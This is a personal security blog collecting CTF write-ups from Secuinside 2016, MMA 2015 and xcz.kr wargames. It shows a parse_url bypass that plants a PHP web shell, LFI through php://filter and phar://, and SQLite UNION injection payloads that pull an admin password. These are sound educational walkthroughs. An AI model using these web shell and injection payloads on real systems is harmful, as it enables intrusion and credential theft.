shpik's world!

[Web] trendyweb - 100pts

0x400 CTF/0x402 Secuinside 2016

해당 문제에 대한 주어진 정보이다.


/(root)에 있는 flag를 읽는 것이 목적이다.


문제에서 Source가 주어졌으며 이를 분석해보자.

(https://gist.github.com/Jinmo/e49dfef9b7325acb12566de3a7f88859)


<?php
error_reporting(E_ALL);
ini_set('display_errors', 'On');
ini_set('allow_url_fopen', 'On'); // yo!
$session_path = '';
	class MyClass { function __wakeup() { system($_GET['cmd']); // come onn!
	} }
	function onShutdown() {
		global $session_path;
		file_put_contents($session_path. '/pickle', serialize($_SESSION));
	}
	session_start();
	register_shutdown_function('onShutdown');
	function set_context($id) {
		global $_SESSION, $session_path;
		$session_path=getcwd() . '/data/'.$id;
		if(!is_dir($session_path)) mkdir($session_path);
		chdir($session_path);
		if(!is_file('pickle')) $_SESSION = array();
		else $_SESSION = unserialize(file_get_contents('pickle'));
	}
	function download_image($url) {
		$url = parse_url($origUrl=$url);
		if(isset($url['scheme']) && $url['scheme'] == 'http')
			if($url['path'] == '/avatar.png') {
				system('/usr/bin/wget '.escapeshellarg($origUrl));
			}
	}
	if(!isset($_SESSION['id'])) {
		$sessId = bin2hex(openssl_random_pseudo_bytes(10));
		$_SESSION['id'] = $sessId;
	} else {
		$sessId = $_SESSION['id'];
	}
	session_write_close();
	set_context($sessId);
	if(isset($_POST['image'])) download_image($_POST['image']);
?>

<img src="/data/<?php echo $sessId; ?>/avatar.png" width=80 height=80 />

ini_set('allow_url_fopen', 'On');

allow_url_fopen이 On되어있는걸로 봐서 LFI나 RFI취약점이 있을거라 예상하였다.


우선 사이트로 접속을 해보면 엑박이 페이지에 출력된다.

http://chal.cykor.kr:8082/data/f1aee8633e39c4445404/avatar.png

상위 폴더로 올라가보면 Directory Listing 가능하다.

http://chal.cykor.kr:8082/data/f1aee8633e39c4445404/


존재하는 파일은 pickle이다.

pickle의 내용은 쓸모가 없는 내용이다.


다시 Source로 돌아가보면 download_image를 통해 이미지를 다운로드 하는데 POST값으로 image를 넘기고, 이 값에 parse_url한 값의 path부분이 /avatar.png인 경우 wget명령어를 통해 이미지 파일을 다운 받는다.


"http://0.0.0.0/avatar.png?n=shpik"의 주소에서 parse_url의 path부분은 /avatar.png가 되므로 ?뒤에 .php를 붙이는 것으로 parse_url를 우회하여 다음과 같은 웹쉘을 업로드 하였다.


<?php system($_GET['c']);?>

이를 통해 /(root)에 `flag_is_heeeeeeeereeeeeee`란 파일이 존재함을 알았다.


http://chal.cykor.kr:8082/data/f1aee8633e39c4445404/avatar.png%3f3.php?c=/flag_is_heeeeeeeereeeeeee


flag is

1-day is not trendy enough  ]

'0x400 CTF > 0x402 Secuinside 2016' 카테고리의 다른 글

Secuinside 2016 후기  (0) 2016.07.13
[CGC] CYKOR_00001, CYKOR_00001_patch - each 100pts  (0) 2016.07.13
[Web] trendyweb - 100pts  (0) 2016.07.13

[Web] Mortal Magi Agents - 300pts

0x400 CTF/0x401 MMA 1st 2015


Problem

http://magiagents.chal.mmactf.link/

Flag

#Your ScoreScoreTeams
1300300

77


This problem is LFI vulnerable.


Problem Page [ http://magiagents.chal.mmactf.link/ ]



'indxe.php?page=settings' is vulnerable point.

file upload is settings page.


First I got a php source.


http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home

// home.php


// index.php
<?php
session_start();

if (!isset($_GET["page"]) || isset($page))
    $page = "home";
else
    $page = $_GET["page"];
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.ico">

    <title>Mortal Magi Agents</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/jumbotron.css" rel="stylesheet">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>

  <body>

    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
        </div>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="?page=home">Home</a></li>
            <li><a href="?page=news">News</a></li>
            <li><a href="#contact">Contact</a></li>
          </ul>
<?php if (isset($_SESSION["user"])) { ?>
          <ul class="nav navbar-nav navbar-right">
            <li class='dropdown'>
              <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
              <?php
              if (isset($_SESSION["avator"])) {
                  echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">';
              }
              echo $_SESSION["user"];
              ?><span class='caret'></span></a>
              <ul class='dropdown-menu' role='menu'>
              <li><a href="?page=settings">Settings</a></li>
              <li><a href="logout.php">Sign out</a></li>
              </ul>
            </li>
          </ul>
<?php } else { ?>
          <form class="navbar-form navbar-right" action="login.php" method="post">
            <div class="form-group">
              <input type="text" placeholder="User" class="form-control" name="user">
            </div>
            <div class="form-group">
              <input type="password" placeholder="Password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-success" name="signin">Sign in</button>
            <button type="submit" class="btn btn-danger" name="signup">Sign up</button>
          </form>
<?php } ?>
        </div><!--/.nav-collapse -->
      </div>
    </nav>

    <!-- Main jumbotron for a primary marketing message or call to action -->
    <!--
    <div class="jumbotron">
    </div>
    -->
    <div class="container">
<?php
include("$page.php");
?>
      </div>


      <hr>

      <footer>
        <p>Mortal Magi Agents 2015</p>
      </footer>
    </div> <!-- /container -->


    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
  </body>
</html>


// settings.php
<?php
require "./db.php";
if (isset($_FILES["file"])) {
    if ($_FILES['file']['type'] == "image/jpeg") {
        $ext = ".jpg";
    }
    else if ($_FILES['file']['type'] == "image/gif") {
        $ext = ".gif";
    }
    else if ($_FILES['file']['type'] == "image/png") {
        $ext = ".png";
    }
    $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    
    $_SESSION["avator"] = $filename;
    $db = connect_db();
    $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
}
?>
<div class="page-header"><h1>Settings</h1></div>
<h2>Avator</h2>
<?php
if (isset($_SESSION["avator"])) {
?>
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<?php
}
?>
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>



upload file name is 'user'+sha1(filename)

but, this name is no problem.


i used phar://


getflag.php

<?php echo file_get_contents('../flag');?>


http://magiagents.chal.mmactf.link/?page=phar:///var/www/html/avators/afafafb347d0cf8bd02e7ddd7c018e74fa336beff2b0b5.jpg/getflag


MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}


Good

Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}


'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08

[Web] Login as admin! - 30pts

0x400 CTF/0x401 MMA 1st 2015


Problem

Login as admin. And get the flag! The flag is the password of admin.

http://arrive.chal.mmactf.link/login.cgi

You can use test:test.

Flag

#Your ScoreScoreTeams
13030318


Problem Page [ http://arrive.chal.mmactf.link/login.cgi ]

 
 



This Problem is sql injection,then this is sqlite.


Let's exploit!


First I send query simply


POST DATA : username=admin' --&password=1

Congratulations!!
You are admin user.
The flag is your password!

logout


oh... flag is admin's password.


therefore i find table name.


POST DATA : username=admin' union select name, NULL from sqlite_master--&password=1

You are user user.

logout

Table name is 'user'.


so, i inject username with union command


POST DATA : username=admin' union select password,NULL from user limit 0,1--&password=1


You are MMA{cats_alice_band} user.

logout


Good!

Flag is MMA{cats_alice_band}


Actually this problem is not filtering.

so, you can used blind sql injection.




Author : shpik (http://shpik.tistory.com)

'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08

[Prob13] Network Recovery! - Network 150

0x300 wargame/0x303 xcz.kr

Title

Network Recovery!

Description
Key Format = lowercase(md5("Key"))

Download Here 


View Solution


'0x300 wargame > 0x303 xcz.kr' 카테고리의 다른 글

[Prob13] Network Recovery! - Network 150  (0) 2015.08.27
[Prob32] Easy Trick - Web 100  (0) 2015.08.26
[Prob21] PHP Obfuscation Crack - Web 300  (0) 2015.08.19

[Prob32] Easy Trick - Web 100

0x300 wargame/0x303 xcz.kr

Title

Easy Trick


Description

Korean

PHP 트릭을 이용해서 키를 구하세요.


English

Find The key with PHP trick


Prob Page

Source Page 


View Solution


'0x300 wargame > 0x303 xcz.kr' 카테고리의 다른 글

[Prob13] Network Recovery! - Network 150  (0) 2015.08.27
[Prob32] Easy Trick - Web 100  (0) 2015.08.26
[Prob21] PHP Obfuscation Crack - Web 300  (0) 2015.08.19

[Prob21] PHP Obfuscation Crack - Web 300

0x300 wargame/0x303 xcz.kr


Title
PHP Obfuscation Crack

Description
View source

Wrong T.T


View Source

 
<?php
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67\x61\x73y\x61\x72\x6b\x6e\x64"]="\x62";${"\x47\x4c\x4f\x42AL\x53"}["r\x77\x6cii\x69\x71\x66\x76\x66\x70"]="i";function h($a){${"\x47\x4cO\x42\x41L\x53"}["\x70x\x7a\x77\x65\x61h\x72\x75\x71\x6f\x6b"]="\x62";${${"\x47LO\x42\x41\x4c\x53"}["\x70\x78z\x77\x65\x61\x68\x72u\x71\x6f\x6b"]}="";${"GL\x4fB\x41\x4c\x53"}["u\x78\x6fi\x69i\x6b\x61pcv"]="\x62";for(${${"\x47\x4c\x4f\x42A\x4c\x53"}["r\x77\x6c\x69\x69i\x71\x66\x76fp"]}=0;${${"\x47\x4c\x4f\x42A\x4cS"}["\x72\x77l\x69i\x69\x71\x66\x76\x66\x70"]}<5;${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x72\x77\x6ci\x69\x69qf\x76\x66\x70"]}++){$ydzorvqk="\x61";$gflrozo="\x62";${"\x47\x4cOB\x41\x4cS"}["\x65\x72p\x78\x7a\x6fz\x64\x65y"]="i";${$gflrozo}=${${"G\x4c\x4f\x42AL\x53"}["\x67\x61sy\x61\x72k\x6e\x64"]}+ord(substr(${$ydzorvqk},${${"\x47\x4c\x4f\x42ALS"}["\x65rp\x78\x7a\x6fz\x64e\x79"]},1));}return${${"\x47\x4c\x4fBA\x4cS"}["\x75x\x6fi\x69i\x6b\x61\x70\x63v"]};}$jbojdbertutk="\x4b\x45\x59";$vtefigaylx="mu\x6e";${"G\x4cOB\x41L\x53"}["\x68p\x63eeyx\x74o"]="\x61";$ktjmdjm="a";${"\x47\x4c\x4f\x42ALS"}["\x6d\x69mt\x65\x6du\x63\x79\x62\x70c"]="\x6d\x75\x6e";${$jbojdbertutk}="\x43o\x6e\x67\x72a\x74\x75\x6ca\x74\x69\x6f\x6es\x21</\x62r\x3e\x4be\x79\x20i\x73 ?????????????????????";${"GL\x4f\x42\x41\x4cS"}["\x67\x6d\x66i\x66\x62f\x6c"]="\x61";${${"G\x4c\x4f\x42AL\x53"}["\x6d\x69\x6d\x74em\x75c\x79\x62p\x63"]}=@$_GET["\x6b\x65y"];${"GL\x4f\x42A\x4c\x53"}["w\x76d\x63\x78\x73\x64\x73\x71b"]="x";@${$ktjmdjm}=explode("-",${$vtefigaylx});$gfxqkfxurga="\x78";$dlmordkk="\x61";for(${${"\x47\x4c\x4fBA\x4cS"}["w\x76\x64\x63\x78\x73\x64\x73\x71b"]}=0;${${"\x47\x4c\x4f\x42\x41LS"}["\x77v\x64\x63\x78s\x64\x73\x71\x62"]}<5;${$gfxqkfxurga}++){if(preg_match("/[^a-\x7a\x41-\x5a\x30-\x39]/",@${${"\x47\x4cOB\x41\x4c\x53"}["\x68pc\x65e\x79\x78\x74\x6f"]}[${${"\x47\x4cO\x42A\x4c\x53"}["\x77vd\x63\x78\x73ds\x71\x62"]}])){exit("\x45rr\x6f\x72!");}}if(is_numeric(substr(${${"\x47LO\x42\x41\x4c\x53"}["\x68p\x63e\x65y\x78to"]}[0],0,2))&&!is_numeric(substr(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x70\x63ee\x79\x78t\x6f"]}[0],4,1))&&h(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["gm\x66\x69fbfl"]}[0])>312&&h(${${"\x47L\x4f\x42A\x4cS"}["h\x70\x63e\x65yx\x74\x6f"]}[0])<333&&!is_numeric(substr(${$dlmordkk}[1],0,1))&&is_numeric(substr(${${"\x47\x4c\x4fB\x41LS"}["hpc\x65ey\x78to"]}[1],3,2))){$qcpkjlbgy="\x61";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x71\x6f\x74\x6a\x62\x76\x6e"]="\x61";${"G\x4cO\x42ALS"}["bb\x67h\x7a\x6f\x74"]="\x61";if(h(${${"\x47\x4c\x4f\x42\x41LS"}["b\x62g\x68z\x6ft"]}[1])>300&&h(${$qcpkjlbgy}[1])<326&&!is_numeric(substr(${${"GL\x4f\x42\x41\x4c\x53"}["hp\x63\x65\x65yx\x74o"]}[2],0,1))&&is_numeric(substr(${${"\x47LO\x42AL\x53"}["\x68\x70c\x65e\x79xt\x6f"]}[2],1,1))&&h(${${"GLO\x42\x41L\x53"}["o\x71o\x74\x6a\x62\x76n"]}[2])>349&&h(${${"\x47\x4c\x4fB\x41\x4cS"}["h\x70c\x65\x65\x79x\x74o"]}[2])<407){${"\x47L\x4fBA\x4cS"}["\x77\x73ju\x78\x77\x78bz\x6d\x73"]="\x61";${"\x47\x4cOB\x41\x4c\x53"}["o\x66\x76\x6d\x69\x61\x74\x63\x64ko"]="a";$oqhejquzit="a";if(!is_numeric(substr(${${"G\x4c\x4fBA\x4cS"}["\x77\x73\x6au\x78\x77\x78bz\x6d\x73"]}[3],0,2))&&is_numeric(substr(${$oqhejquzit}[3],2,3))&&h(${${"GL\x4f\x42\x41\x4c\x53"}["o\x66\x76\x6di\x61\x74\x63\x64\x6b\x6f"]}[3])>357&&h(${${"\x47\x4c\x4fBA\x4cS"}["hp\x63\x65ey\x78\x74\x6f"]}[3])<359){${"G\x4c\x4f\x42\x41L\x53"}["\x65rq\x71jp\x63t"]="\x61";${"G\x4c\x4fBAL\x53"}["ok\x67\x6f\x6e\x64\x66\x69\x64\x6b\x79"]="\x61";if(round((h(${${"G\x4c\x4f\x42A\x4c\x53"}["\x68\x70c\x65\x65y\x78t\x6f"]}[0])+h(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6fkg\x6f\x6ed\x66\x69\x64\x6b\x79"]}[1])+h(${${"\x47\x4c\x4f\x42AL\x53"}["h\x70c\x65e\x79\x78\x74\x6f"]}[2])+h(${${"\x47L\x4f\x42A\x4cS"}["h\x70\x63e\x65\x79\x78\x74o"]}[3]))/4)==h(${${"\x47L\x4f\x42ALS"}["\x65\x72\x71\x71\x6a\x70ct"]}[4])){$oaqqkxn="\x4b\x45\x59";exit(${$oaqqkxn});}}}}echo"\x57\x72ong\x20\x54.T";
?>



View Solution


'0x300 wargame > 0x303 xcz.kr' 카테고리의 다른 글

[Prob13] Network Recovery! - Network 150  (0) 2015.08.27
[Prob32] Easy Trick - Web 100  (0) 2015.08.26
[Prob21] PHP Obfuscation Crack - Web 300  (0) 2015.08.19

[Rookies] echo1 - 25pt

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

All Clear

0x300 wargame/0x301 webhacking.kr


'0x300 wargame > 0x301 webhacking.kr' 카테고리의 다른 글

All Clear  (0) 2015.07.01

분류없음


안녕하세요, shpik입니다.


이 블로그는 보안&해킹&게임&일상으로 구성되어 있으며, 게임과 일상을 제외하고는 대부분 비공개입니다.


내용을 보고 싶으신 분은 따로 담벼락에 물어봐주시기 바랍니다.




Hello !


This blog is composed of Computer Security & Hacking & Game & Life.








Online

- League of Legend

- Maple Story 2

Steam

- Borderland 2

- The binding of Isaac:Rebirth

Mobile

- Seven knights


[Toddler's Bottle] mistake

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.